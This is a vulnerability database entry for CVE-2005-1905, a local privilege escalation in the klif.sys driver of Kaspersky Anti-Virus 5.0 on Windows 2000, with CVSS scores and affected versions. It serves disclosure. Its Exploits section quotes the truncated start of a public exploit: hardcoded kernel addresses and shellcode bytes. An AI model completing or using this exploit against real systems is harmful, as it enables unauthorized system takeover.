7.2
CVSSv2

CVE-2005-1905

Published: 09/06/2005 Updated: 18/10/2016
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The klif.sys driver in Kaspersky Labs Anti-Virus 5.0.227, 5.0.228, and 5.0.335 on Windows 2000 allows local users to gain privileges by modifying certain critical code addresses that are later accessed by privileged programs.

Vulnerable Product Search on Vulmon Subscribe to Product

kaspersky lab kaspersky anti-virus 5.0.335

kaspersky lab kaspersky anti-virus personal 5.0.227

kaspersky lab kaspersky anti-virus personal 5.0.228

kaspersky lab kaspersky anti-virus 5.0.227

kaspersky lab kaspersky anti-virus 5.0.228

kaspersky lab kaspersky anti-virus personal 5.0.325

Exploits

/* Added NO_STRICT to 1 on line 2 /str0ke ! milw0rmcom */ #define NO_STRICT 1 #include <windowsh> #undef STRICT PUCHAR pCodeBase=(PUCHAR)0xBE9372C0; PDWORD pJmpAddress=(PDWORD)0xBE9372B0; PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046}; PUCHAR pKAVRet; unsigned char code[]={0x68,0x00,0x02,0x00,0x00, //push 0x200 0x68,0 ...